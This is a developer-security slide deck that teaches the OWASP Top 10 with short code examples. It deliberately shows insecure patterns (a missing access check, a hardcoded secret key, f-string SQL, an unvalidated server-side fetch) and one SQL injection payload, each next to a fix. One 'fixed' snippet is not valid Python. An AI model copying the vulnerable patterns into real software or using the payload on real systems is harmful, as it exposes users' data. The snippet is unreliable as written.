# The DevSec Speedrun By Robert Babaev --- ## What is DevSec? - **Dev**eloper **Sec**urity - Security errors are way cheaper to fix earlier on - Testing, deployment, etc. - Security is everyone's problem (including yours) - Demonstrable security skills are also attractive - If the company is competent --- ## What is Security? In short, protecting information and assets. --- ## Where Do We Start? - OWASP Top 10 - Most common web vulnerabilities - Trendy tech - Not everything new is secure --- ## Broken Access Control - Accessing things you should not be able to - Deny by default - Assume people should not access something unless proven otherwise - Everything is off limits unless you have creds - Don't leave things accessible - Git metadata - Backups ---- - Query by account id parameter ``` pstmt.setString(1, request.getParameter("acct")); ResultSet results = pstmt.executeQuery( ); ``` - No check on whether the user actually has that account --- ## Cryptographic Failures - Has a lot of things - One aspect is secret keys - DO NOT LEAVE SECRET KEYS IN SOURCE CODE!!!! - - Environment Variables - On-the-fly generation ---- Example: ```python! # Method 1 (terrible): generate outside and hard code secret_key = "OipUo3vV4hRUTLCOCaG7UIBqQll3EJuXfup-x-1GDkE" # Method 2 (better): environment variables # Note: Don't hard code a default key secret_key = os.environ.get("APP_SECRET_KEY", (raise NoKeyError)) # Method 3 (debatably best): on-the-fly generation secret_key = secrets.token_urlsafe(64) ``` - Use env vars or on-the-fly generation - Env vars may be better with session storage --- ## Injection - Shoving code where code should not be shoved - App doesn't know what statements are malicious or benign ---- SQL injection ```python # Method 1: Injection! # What happens when user_input is '0 UNION SELECT * FROM users'? user_input = request.GET['choice'] cur.execute(f'SELECT * FROM items WHERE id={user_input}') # Method 2: Prepared Statements user_input = request.GET['choice'] cur.execute('SELECT * FROM ITEMS WHERE id=?', user_input) ``` - SQL doesn't get compiled with attack - Just treats it as normal string - ORMs are also a good idea --- ## Insecure Design - Less strictly coding, more design ---- Example: - In 2021, graphics card scalping made for an incredibly frustrating market - To combat this, WeSellGPUs.com decided to implement a 1 GPU per customer policy - Small problem - How do you determine what a customer is? - Someone could make multiple order flows with a bot, or manually --- ## Security Misconfiguration - You have a secure site in theory, but something is missing - Ex: You left password auth on for the server --- ## Vulnerable and Outdated Components - Software gets old! - Snyk - Vulnerability DB - See which packages have known vulns - Dependabot, Renovate - Automatically update your dependencies --- ## Identification and Authentication Failures - Your login page sucks at keeping attackers out - Brute forcing and credential stuffing - Username enumeration - "That user doesn't exist", "Incorrect password" - Complete lack of rate limiting or account lockouts --- ## Software and Data Integrity Failures - Basically boils down to using actively malicious packages - In a phrase: supply chain attacks - Recommendations: Use known good packages, repositories, verify tools, etc. --- ## Logging and Monitoring Failures - Logging is not just for debugging - Can pinpoint whether attacks are happening - If you don't have good logging? - Attacks take months to find - With good logging and monitoring, hours, if not seconds --- ## Server Side Request Forgery - Ever had a site take a URL as input and send a request to it? - No URL verification, response visible, HUGE PROBLEM - Risk of internal servers being compromised ---- Example: ```python url = request.GET['site'] # No verification! r = requests.get(url) # ... display stuff ... ``` - Use a whitelist where possible - Only allowed domains work --- ## A Note On JWTs - With JWTs, logouts aren't really a thing - Can't block out attackers, etc. - Can save the token, and then reuse it after logout - Compromise: - Add "session" attribute to payload - When user logs out, add to DB table - Does kill the stateless aspect